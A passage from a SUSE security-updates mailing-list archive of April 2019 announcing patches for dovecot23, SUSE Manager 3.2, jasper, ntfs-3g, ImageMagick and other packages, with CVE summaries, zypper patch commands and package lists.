lists.suse.com Tue Apr 23 16:09:56 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 00:09:56 +0200 (CEST) Subject: SUSE-SU-2019:0997-1: important: Security update for dovecot23 Message-ID: <20190423220956.641B1FDF1@maintenance.suse.de> SUSE Security Update: Security update for dovecot23 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0997-1 Rating: important References: #1132501 Cross-References: CVE-2019-10691 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for dovecot23 fixes the following issues: Security issue fixed: - CVE-2019-10691: Fixed a denial of service via reachable assertion when processing invalid UTF-8 characters (bsc#1132501). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-997=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64): dovecot23-2.3.3-4.13.1 dovecot23-backend-mysql-2.3.3-4.13.1 dovecot23-backend-mysql-debuginfo-2.3.3-4.13.1 dovecot23-backend-pgsql-2.3.3-4.13.1 dovecot23-backend-pgsql-debuginfo-2.3.3-4.13.1 dovecot23-backend-sqlite-2.3.3-4.13.1 dovecot23-backend-sqlite-debuginfo-2.3.3-4.13.1 dovecot23-debuginfo-2.3.3-4.13.1 dovecot23-debugsource-2.3.3-4.13.1 dovecot23-devel-2.3.3-4.13.1 dovecot23-fts-2.3.3-4.13.1 dovecot23-fts-debuginfo-2.3.3-4.13.1 dovecot23-fts-lucene-2.3.3-4.13.1 dovecot23-fts-lucene-debuginfo-2.3.3-4.13.1 dovecot23-fts-solr-2.3.3-4.13.1 dovecot23-fts-solr-debuginfo-2.3.3-4.13.1 dovecot23-fts-squat-2.3.3-4.13.1 dovecot23-fts-squat-debuginfo-2.3.3-4.13.1 References: https://www.suse.com/security/cve/CVE-2019-10691.html https://bugzilla.suse.com/1132501 From sle-security-updates at lists.suse.com Wed Apr 24 07:18:09 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 15:18:09 +0200 (CEST) Subject: SUSE-SU-2019:1006-1: moderate: Security update for several packages related to SUSE Manger 3.2 Message-ID: <20190424131810.009EAFDF2@maintenance.suse.de> SUSE Security Update: Security update for several packages related to SUSE Manger 3.2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1006-1 Rating: moderate References: #1109316 #1120242 #1121195 #1122230 #1122381 #1122837 #1124290 #1125600 #1125744 #1126075 #1126099 #1126518 #1127542 #1128228 #1128724 #1128781 #1129765 #1129851 #1129956 #1130658 #1131490 #1131677 #1131721 #1132579 Cross-References: CVE-2017-7957 Affected Products: SUSE Manager Server 3.2 SUSE Manager Proxy 3.2 ______________________________________________________________________________ An update that solves one vulnerability and has 23 fixes is now available. Description: This consolidated update includes multiple patchinfos for SUSE Manager Server and Proxy Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Manager Server 3.2: zypper in -t patch SUSE-SUSE-Manager-Server-3.2-2019-1006=1 - SUSE Manager Proxy 3.2: zypper in -t patch SUSE-SUSE-Manager-Proxy-3.2-2019-1006=1 Package List: - SUSE Manager Server 3.2 (ppc64le s390x x86_64): reprepro-5.3.0-2.3.3 smdba-1.6.4-0.3.9.3 spacewalk-branding-2.8.5.15-3.19.3 susemanager-3.2.17-3.22.4 susemanager-tools-3.2.17-3.22.4 - SUSE Manager Server 3.2 (noarch): apache-commons-lang3-3.4-3.3.3 cobbler-2.6.6-6.16.3 drools-7.17.0-3.3.3 guava-27.0.1-3.3.3 jade4j-1.0.7-3.3.3 kie-api-7.17.0-3.3.3 kie-soup-7.17.0.Final-2.3.3 optaplanner-7.17.0-3.3.3 py26-compat-salt-2016.11.10-6.21.3 python2-spacewalk-certs-tools-2.8.8.7-3.6.3 spacecmd-2.8.25.10-3.20.3 spacewalk-admin-2.8.4.4-3.6.3 spacewalk-backend-2.8.57.14-3.25.3 spacewalk-backend-app-2.8.57.14-3.25.3 spacewalk-backend-applet-2.8.57.14-3.25.3 spacewalk-backend-config-files-2.8.57.14-3.25.3 spacewalk-backend-config-files-common-2.8.57.14-3.25.3 spacewalk-backend-config-files-tool-2.8.57.14-3.25.3 spacewalk-backend-iss-2.8.57.14-3.25.3 spacewalk-backend-iss-export-2.8.57.14-3.25.3 spacewalk-backend-libs-2.8.57.14-3.25.3 spacewalk-backend-package-push-server-2.8.57.14-3.25.3 spacewalk-backend-server-2.8.57.14-3.25.3 spacewalk-backend-sql-2.8.57.14-3.25.3 spacewalk-backend-sql-oracle-2.8.57.14-3.25.3 spacewalk-backend-sql-postgresql-2.8.57.14-3.25.3 spacewalk-backend-tools-2.8.57.14-3.25.3 spacewalk-backend-xml-export-libs-2.8.57.14-3.25.3 spacewalk-backend-xmlrpc-2.8.57.14-3.25.3 spacewalk-base-2.8.7.15-3.24.3 spacewalk-base-minimal-2.8.7.15-3.24.3 spacewalk-base-minimal-config-2.8.7.15-3.24.3 spacewalk-certs-tools-2.8.8.7-3.6.3 spacewalk-html-2.8.7.15-3.24.3 spacewalk-java-2.8.78.21-3.29.1 spacewalk-java-config-2.8.78.21-3.29.1 spacewalk-java-lib-2.8.78.21-3.29.1 spacewalk-java-oracle-2.8.78.21-3.29.1 spacewalk-java-postgresql-2.8.78.21-3.29.1 spacewalk-taskomatic-2.8.78.21-3.29.1 subscription-matcher-0.23-4.12.3 susemanager-schema-3.2.18-3.22.3 susemanager-sls-3.2.23-3.26.3 susemanager-sync-data-3.2.14-3.20.3 susemanager-web-libs-2.8.7.15-3.24.3 xstream-1.4.10-4.3.3 - SUSE Manager Proxy 3.2 (noarch): python2-spacewalk-certs-tools-2.8.8.7-3.6.3 spacewalk-backend-2.8.57.14-3.25.3 spacewalk-backend-libs-2.8.57.14-3.25.3 spacewalk-base-minimal-2.8.7.15-3.24.3 spacewalk-base-minimal-config-2.8.7.15-3.24.3 spacewalk-certs-tools-2.8.8.7-3.6.3 susemanager-web-libs-2.8.7.15-3.24.3 References: https://www.suse.com/security/cve/CVE-2017-7957.html https://bugzilla.suse.com/1109316 https://bugzilla.suse.com/1120242 https://bugzilla.suse.com/1121195 https://bugzilla.suse.com/1122230 https://bugzilla.suse.com/1122381 https://bugzilla.suse.com/1122837 https://bugzilla.suse.com/1124290 https://bugzilla.suse.com/1125600 https://bugzilla.suse.com/1125744 https://bugzilla.suse.com/1126075 https://bugzilla.suse.com/1126099 https://bugzilla.suse.com/1126518 https://bugzilla.suse.com/1127542 https://bugzilla.suse.com/1128228 https://bugzilla.suse.com/1128724 https://bugzilla.suse.com/1128781 https://bugzilla.suse.com/1129765 https://bugzilla.suse.com/1129851 https://bugzilla.suse.com/1129956 https://bugzilla.suse.com/1130658 https://bugzilla.suse.com/1131490 https://bugzilla.suse.com/1131677 https://bugzilla.suse.com/1131721 https://bugzilla.suse.com/1132579 From sle-security-updates at lists.suse.com Wed Apr 24 09:43:09 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 17:43:09 +0200 (CEST) Subject: SUSE-SU-2019:1018-1: moderate: Security update for jasper Message-ID: <20190424154309.0B40D1013D@maintenance.suse.de> SUSE Security Update: Security update for jasper ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1018-1 Rating: moderate References: #1010783 #1117505 #1117511 Cross-References: CVE-2016-9396 CVE-2018-19539 CVE-2018-19542 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for jasper fixes the following issues: Security issues fixed: - CVE-2018-19542: Fixed a denial of service in jp2_decode (bsc#1117505). - CVE-2018-19539: Fixed a denial of service in jas_image_readcmpt (bsc#1117511). - CVE-2016-9396: Fixed a denial of service in jpc_cox_getcompparms (bsc#1010783). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1018=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1018=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1018=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): jasper-2.0.14-3.3.2 jasper-debuginfo-2.0.14-3.3.2 jasper-debugsource-2.0.14-3.3.2 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): jasper-debuginfo-2.0.14-3.3.2 jasper-debugsource-2.0.14-3.3.2 libjasper-devel-2.0.14-3.3.2 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): jasper-debuginfo-2.0.14-3.3.2 jasper-debugsource-2.0.14-3.3.2 libjasper4-2.0.14-3.3.2 libjasper4-debuginfo-2.0.14-3.3.2 References: https://www.suse.com/security/cve/CVE-2016-9396.html https://www.suse.com/security/cve/CVE-2018-19539.html https://www.suse.com/security/cve/CVE-2018-19542.html https://bugzilla.suse.com/1010783 https://bugzilla.suse.com/1117505 https://bugzilla.suse.com/1117511 From sle-security-updates at lists.suse.com Wed Apr 24 09:44:09 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 17:44:09 +0200 (CEST) Subject: SUSE-SU-2019:1006-1: moderate: Security update for SUSE Manager Server 3.2 Message-ID: <20190424154409.C85C2FDF1@maintenance.suse.de> SUSE Security Update: Security update for SUSE Manager Server 3.2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1006-1 Rating: moderate References: #1070731 #1109316 #1120242 #1121195 #1122230 #1122381 #1122837 #1124290 #1125600 #1125744 #1126075 #1126099 #1126518 #1127542 #1128228 #1128724 #1128781 #1129765 #1129851 #1129956 #1130658 #1131490 #1131677 #1131721 #1132579 Cross-References: CVE-2017-7957 Affected Products: SUSE Manager Server 3.2 SUSE Manager Proxy 3.2 ______________________________________________________________________________ An update that solves one vulnerability and has 24 fixes is now available. Description: This update includes the following new features: to the repository metadata (fate#325676) This update fixes the following issues: apache-commons-lang3: - Run fdupes on javadoc - Specify java target and source level 1.6 to make package compatible with JDK >= 1.8 cobbler: - Fixes case where distribution detection returns None (bsc#1130658) - SUSE texmode fix (bsc#1109316) drools: - Update Drools to 7.17.0 - Release Notes: https://issues.jboss.org/secure/ReleaseNote.jspa - Fixes for SLE 15 compatibility guava: - Updated from 13.0.1 to 27.0.1 - Changes between 13.0.1 and 23.0: https://github.com/google/guava/wiki/Release14 https://github.com/google/guava/wiki/Release15 https://github.com/google/guava/wiki/Release16 https://github.com/google/guava/wiki/Release17 https://github.com/google/guava/wiki/Release18 https://github.com/google/guava/wiki/Release19 https://github.com/google/guava/wiki/Release23 - Changes between 23.0 and 27.0.1: see https://github.com/google/guava/releases jade4j: - Conditional java/java-devel requires based on os version - Update dependency version for commons-lang3 to 3.4 - Fix building javadoc kie-api: - Update KIE to 7.17.0 - Release notes: https://issues.jboss.org/secure/ReleaseNote.jspa optaplanner: - Update Optaplanner to 7.17.0 py26-compat-salt: - Fix minion arguments assign via sysctl (bsc#1124290) smdba: - Make 'smdba space-overview' postgresql version agnostic (bsc#1129956) - Fix version mismatch spacecmd: - Fix system_delete with SSM (bsc#1125744) spacewalk-admin: - Fix encoding bug in salt event processing (bsc#1129851) spacewalk-backend: - Fix linking of packages in reposync (bsc#1131677) - Fix: handle non-standard filenames for comps.xml (bsc#1120242) - Mgr-sign-metadata can optionally clear-sign metadata files spacewalk-branding: - Introduce a description label for the new 'minion-checkin' Taskomatic job (bsc#1122837) spacewalk-certs-tools: - Add support for Ubuntu to bootstrap script - Clean up downloaded gpg keys after bootstrap (bsc#1126075) spacewalk-java: - Fix base channel selection for Ubuntu systems (bsc#1132579) - Fix retrieval of build time for .deb repositories (bsc#1131721) - Allow access to susemanager tools channels without res subscription (bsc#1127542) - Add support for SLES 15 live patches in CVE audit - Add a Taskomatic job to perform minion check-in regularly, drop use of Salt's Mine (bsc#1122837) - Fix errata_details to return details correctly (bsc#1128228) - Support ubuntu products and debian architectures in mgr-sync - Adapt check for available repositories to debian style repositories - Add support for custom username when bootstrapping with Salt-SSH - Read and update running kernel release value at each startup of minion (bsc#1122381) - Add error message on sync refresh when there are no scc credentials - Fix apidoc issues - Fix deleting server when minion_formulas.json is empty (bsc#1122230) - Minion-action-cleanup Taskomatic task: do not clean actions younger than one hour - Schedule full package refresh only once per action chain if needed (bsc#1126518) - Check and schedule package refresh in response to events independently of what originates them (bsc#1126099) - Add configuration option to limit the number of changelog entries added to the repository metadata (fate#325676) - Generate InRelease file for Debian/Ubuntu repos when metadata signing is enabled spacewalk-web: - Show undetected subscription-matching message object as a string anyway (bsc#1125600) - Fix action scheduler time picker prefill when the server is on "UTC/GMT" timezone (bsc#1121195) - Allow username input on bootstrap page when using Salt-SSH - Add cache buster for static files (js/css) to fix caching issues after upgrading. subscription-matcher: - Update dependencies (Drools, Optaplanner, Guava, Xstream) - Make the java and java-devel requirements variable - Relax the requirement condition on apache-commons-lang3 susemanager: - Support creating bootstrap repos for Ubuntu 18.04 and 16.04. - Allow alternative names for bootstrap packages, to allow using old client tools after package renames - Feat: create Ubuntu empty repository - Fix creation of bootstrap repositories for SLE12 (no SP) by requiring python-setuptools only for SLE12 >= SP1 (bsc#1129765) - Add bootstrap repo definition for SLE15 SP1 susemanager-docs_en: - Update text and image files. - Fix bad link. - Update Manual Backup and smdba sections. - Troubleshooting Salt clients. - Fix package endpoint in salt pillar content. - Ubuntu Clients supported. - Change License to GFL 1.2, as it is the real license for the doc since 3.2.0 susemanager-schema: - Add a Taskomatic job to perform minion check-in regularly, drop use of Salt's Mine (bsc#1122837) - Fix performance regression in inter-server-sync (bsc#1128781) - Set minion-action-cleanup run frequency from hourly to daily at midnight susemanager-sls: - Update get_kernel_live_version module to support older Salt versions (bsc#1131490) - Update get_kernel_live_version module to support SLES 15 live patches - Do not configure Salt Mine in newly registered minions (bsc#1122837) - Fix Salt error related to remove_traditional_stack when bootstrapping an Ubuntu minion (bsc#1128724) - Automatically trust SUSE GPG key for client tools channels on Ubuntu systems - Util.systeminfo sls has been added to perform different actions at minion startup(bsc#1122381) susemanager-sync-data: - Allow access to susemanager tools channels without res subscription (bsc#1127542) - Add Ubuntu product definitions - Adapt to SCC changes - Add CaaSP 4 Toolchain xstream: - Update xstream to 1.4.10 - Major changes: - CVE-2017-7957: XStream could cause a Denial of Service when unmarshalling void. (bsc#1070731) - New XStream artifact with -java7 appended as version suffix for a library explicitly without the Java 8 stuff (lambda expression support, converters for java.time.* package). - Improve performance by minimizing call stack of mapper chain. - XSTR-774: Add converters for types of java.time, java.time.chrono, and java.time.temporal packages (converters for LocalDate, LocalDateTime, LocalTime, OffsetDateTime, and ZonedDateTime by Matej Cimbora). - JavaBeanConverter does not respect ignored unknown elements. - Add XStream.setupDefaultSecurity to initialize security framework with defaults of XStream 1.5.x. - Emit error warning if security framework has not been initialized and the XStream instance is vulnerable to known exploits. - Feat: modify patch to be compatible with JDK 11 building - Fixes for SLE 15 compatibility Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Manager Server 3.2: zypper in -t patch SUSE-SUSE-Manager-Server-3.2-2019-1006=1 - SUSE Manager Proxy 3.2: zypper in -t patch SUSE-SUSE-Manager-Proxy-3.2-2019-1006=1 Package List: - SUSE Manager Server 3.2 (ppc64le s390x x86_64): reprepro-5.3.0-2.3.3 smdba-1.6.4-0.3.9.3 spacewalk-branding-2.8.5.15-3.19.3 susemanager-3.2.17-3.22.4 susemanager-tools-3.2.17-3.22.4 - SUSE Manager Server 3.2 (noarch): apache-commons-lang3-3.4-3.3.3 cobbler-2.6.6-6.16.3 drools-7.17.0-3.3.3 guava-27.0.1-3.3.3 jade4j-1.0.7-3.3.3 kie-api-7.17.0-3.3.3 kie-soup-7.17.0.Final-2.3.3 optaplanner-7.17.0-3.3.3 py26-compat-salt-2016.11.10-6.21.3 python2-spacewalk-certs-tools-2.8.8.7-3.6.3 spacecmd-2.8.25.10-3.20.3 spacewalk-admin-2.8.4.4-3.6.3 spacewalk-backend-2.8.57.14-3.25.3 spacewalk-backend-app-2.8.57.14-3.25.3 spacewalk-backend-applet-2.8.57.14-3.25.3 spacewalk-backend-config-files-2.8.57.14-3.25.3 spacewalk-backend-config-files-common-2.8.57.14-3.25.3 spacewalk-backend-config-files-tool-2.8.57.14-3.25.3 spacewalk-backend-iss-2.8.57.14-3.25.3 spacewalk-backend-iss-export-2.8.57.14-3.25.3 spacewalk-backend-libs-2.8.57.14-3.25.3 spacewalk-backend-package-push-server-2.8.57.14-3.25.3 spacewalk-backend-server-2.8.57.14-3.25.3 spacewalk-backend-sql-2.8.57.14-3.25.3 spacewalk-backend-sql-oracle-2.8.57.14-3.25.3 spacewalk-backend-sql-postgresql-2.8.57.14-3.25.3 spacewalk-backend-tools-2.8.57.14-3.25.3 spacewalk-backend-xml-export-libs-2.8.57.14-3.25.3 spacewalk-backend-xmlrpc-2.8.57.14-3.25.3 spacewalk-base-2.8.7.15-3.24.3 spacewalk-base-minimal-2.8.7.15-3.24.3 spacewalk-base-minimal-config-2.8.7.15-3.24.3 spacewalk-certs-tools-2.8.8.7-3.6.3 spacewalk-html-2.8.7.15-3.24.3 spacewalk-java-2.8.78.21-3.29.1 spacewalk-java-config-2.8.78.21-3.29.1 spacewalk-java-lib-2.8.78.21-3.29.1 spacewalk-java-oracle-2.8.78.21-3.29.1 spacewalk-java-postgresql-2.8.78.21-3.29.1 spacewalk-taskomatic-2.8.78.21-3.29.1 subscription-matcher-0.23-4.12.3 susemanager-schema-3.2.18-3.22.3 susemanager-sls-3.2.23-3.26.3 susemanager-sync-data-3.2.14-3.20.3 susemanager-web-libs-2.8.7.15-3.24.3 xstream-1.4.10-4.3.3 - SUSE Manager Proxy 3.2 (noarch): python2-spacewalk-certs-tools-2.8.8.7-3.6.3 spacewalk-backend-2.8.57.14-3.25.3 spacewalk-backend-libs-2.8.57.14-3.25.3 spacewalk-base-minimal-2.8.7.15-3.24.3 spacewalk-base-minimal-config-2.8.7.15-3.24.3 spacewalk-certs-tools-2.8.8.7-3.6.3 susemanager-web-libs-2.8.7.15-3.24.3 References: https://www.suse.com/security/cve/CVE-2017-7957.html https://bugzilla.suse.com/1070731 https://bugzilla.suse.com/1109316 https://bugzilla.suse.com/1120242 https://bugzilla.suse.com/1121195 https://bugzilla.suse.com/1122230 https://bugzilla.suse.com/1122381 https://bugzilla.suse.com/1122837 https://bugzilla.suse.com/1124290 https://bugzilla.suse.com/1125600 https://bugzilla.suse.com/1125744 https://bugzilla.suse.com/1126075 https://bugzilla.suse.com/1126099 https://bugzilla.suse.com/1126518 https://bugzilla.suse.com/1127542 https://bugzilla.suse.com/1128228 https://bugzilla.suse.com/1128724 https://bugzilla.suse.com/1128781 https://bugzilla.suse.com/1129765 https://bugzilla.suse.com/1129851 https://bugzilla.suse.com/1129956 https://bugzilla.suse.com/1130658 https://bugzilla.suse.com/1131490 https://bugzilla.suse.com/1131677 https://bugzilla.suse.com/1131721 https://bugzilla.suse.com/1132579 From sle-security-updates at lists.suse.com Wed Apr 24 09:49:49 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 17:49:49 +0200 (CEST) Subject: SUSE-SU-2019:1001-1: moderate: Security update for ntfs-3g_ntfsprogs Message-ID: <20190424154949.07451FDF1@maintenance.suse.de> SUSE Security Update: Security update for ntfs-3g_ntfsprogs ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1001-1 Rating: moderate References: #1130165 Cross-References: CVE-2019-9755 Affected Products: SUSE Linux Enterprise Workstation Extension 15 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for ntfs-3g_ntfsprogs fixes the following issues: Security issues fixed: - CVE-2019-9755: Fixed a heap-based buffer overflow which could lead to local privilege escalation (bsc#1130165). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Workstation Extension 15: zypper in -t patch SUSE-SLE-Product-WE-15-2019-1001=1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1001=1 Package List: - SUSE Linux Enterprise Workstation Extension 15 (x86_64): libntfs-3g87-2016.2.22-3.3.2 libntfs-3g87-debuginfo-2016.2.22-3.3.2 ntfs-3g-2016.2.22-3.3.2 ntfs-3g-debuginfo-2016.2.22-3.3.2 ntfs-3g_ntfsprogs-debuginfo-2016.2.22-3.3.2 ntfs-3g_ntfsprogs-debugsource-2016.2.22-3.3.2 ntfsprogs-2016.2.22-3.3.2 ntfsprogs-debuginfo-2016.2.22-3.3.2 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): libntfs-3g-devel-2016.2.22-3.3.2 ntfs-3g_ntfsprogs-debuginfo-2016.2.22-3.3.2 ntfs-3g_ntfsprogs-debugsource-2016.2.22-3.3.2 ntfsprogs-extra-2016.2.22-3.3.2 ntfsprogs-extra-debuginfo-2016.2.22-3.3.2 References: https://www.suse.com/security/cve/CVE-2019-9755.html https://bugzilla.suse.com/1130165 From sle-security-updates at lists.suse.com Wed Apr 24 09:51:42 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 17:51:42 +0200 (CEST) Subject: SUSE-SU-2019:1019-1: moderate: Security update for ImageMagick Message-ID: <20190424155142.31123FDF1@maintenance.suse.de> SUSE Security Update: Security update for ImageMagick ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1019-1 Rating: moderate References: #1122033 #1130330 #1131317 #1132054 #1132060 Cross-References: CVE-2019-10650 CVE-2019-11007 CVE-2019-11008 CVE-2019-9956 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 ______________________________________________________________________________ An update that solves four vulnerabilities and has one errata is now available. Description: This update for ImageMagick fixes the following issues: Security issues fixed: - CVE-2019-9956: Fixed a stack-based buffer overflow in PopHexPixel() (bsc#1130330). - CVE-2019-10650: Fixed a heap-based buffer over-read in WriteTIFFImage() (bsc#1131317). - CVE-2019-11007: Fixed a heap-based buffer overflow in ReadMNGImage() (bsc#1132060). - CVE-2019-11008: Fixed a heap-based buffer overflow in WriteXWDImage() (bsc#1132054). - Added extra -config- packages with Postscript/EPS/PDF readers still enabled. Removing the PS decoders is used to harden ImageMagick against security issues within ghostscript. Enabling them might impact security. (bsc#1122033) These are two packages that can be selected: - ImageMagick-config-7-SUSE: This has the PS decoders disabled. - ImageMagick-config-7-upstream: This has the PS decoders enabled. Depending on your local needs install either one of them. The default is the -SUSE configuration. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1019=1 - SUSE Linux Enterprise Module for Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-1019=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1019=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): ImageMagick-debuginfo-7.0.7.34-3.54.3 ImageMagick-debugsource-7.0.7.34-3.54.3 ImageMagick-extra-7.0.7.34-3.54.3 ImageMagick-extra-debuginfo-7.0.7.34-3.54.3 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): ImageMagick-doc-7.0.7.34-3.54.3 - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64): ImageMagick-debuginfo-7.0.7.34-3.54.3 ImageMagick-debugsource-7.0.7.34-3.54.3 perl-PerlMagick-7.0.7.34-3.54.3 perl-PerlMagick-debuginfo-7.0.7.34-3.54.3 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): ImageMagick-7.0.7.34-3.54.3 ImageMagick-config-7-SUSE-7.0.7.34-3.54.3 ImageMagick-config-7-upstream-7.0.7.34-3.54.3 ImageMagick-debuginfo-7.0.7.34-3.54.3 ImageMagick-debugsource-7.0.7.34-3.54.3 ImageMagick-devel-7.0.7.34-3.54.3 libMagick++-7_Q16HDRI4-7.0.7.34-3.54.3 libMagick++-7_Q16HDRI4-debuginfo-7.0.7.34-3.54.3 libMagick++-devel-7.0.7.34-3.54.3 libMagickCore-7_Q16HDRI6-7.0.7.34-3.54.3 libMagickCore-7_Q16HDRI6-debuginfo-7.0.7.34-3.54.3 libMagickWand-7_Q16HDRI6-7.0.7.34-3.54.3 libMagickWand-7_Q16HDRI6-debuginfo-7.0.7.34-3.54.3 References: https://www.suse.com/security/cve/CVE-2019-10650.html https://www.suse.com/security/cve/CVE-2019-11007.html https://www.suse.com/security/cve/CVE-2019-11008.html https://www.suse.com/security/cve/CVE-2019-9956.html https://bugzilla.suse.com/1122033 https://bugzilla.suse.com/1130330 https://bugzilla.suse.com/1131317 https://bugzilla.suse.com/1132054 https://bugzilla.suse.com/1132060 From sle-security-updates at lists.suse.com Wed Apr 24 10:10:59 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 18:10:59 +0200 (CEST) Subject: SUSE-SU-2019:1000-1: moderate: Security update for ntfs-3g_ntfsprogs Message-ID: <20190424161059.91CAAFDF2@maintenance.suse.de> SUSE Security Update: Security update for ntfs-3g_ntfsprogs ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1000-1 Rating: moderate References: #1130165 Cross-References: CVE-2019-9755 Affected Products: SUSE Linux Enterprise Workstation Extension 12-SP4 SUSE Linux Enterprise Workstation Extension 12-SP3 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for ntfs-3g_ntfsprogs fixes the following issues: Security issues fixed: - CVE-2019-9755: Fixed a heap-based buffer overflow which could lead to local privilege escalation (bsc#1130165). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Workstation Extension 12-SP4: zypper in -t patch SUSE-SLE-WE-12-SP4-2019-1000=1 - SUSE Linux Enterprise Workstation Extension 12-SP3: zypper in -t patch SUSE-SLE-WE-12-SP3-2019-1000=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1000=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1000=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1000=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1000=1 Package List: - SUSE Linux Enterprise Workstation Extension 12-SP4 (x86_64): libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g-2013.1.13-5.6.1 ntfs-3g-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 ntfsprogs-2013.1.13-5.6.1 ntfsprogs-debuginfo-2013.1.13-5.6.1 - SUSE Linux Enterprise Workstation Extension 12-SP3 (x86_64): libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g-2013.1.13-5.6.1 ntfs-3g-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 ntfsprogs-2013.1.13-5.6.1 ntfsprogs-debuginfo-2013.1.13-5.6.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libntfs-3g-devel-2013.1.13-5.6.1 libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libntfs-3g-devel-2013.1.13-5.6.1 libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g-2013.1.13-5.6.1 ntfs-3g-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 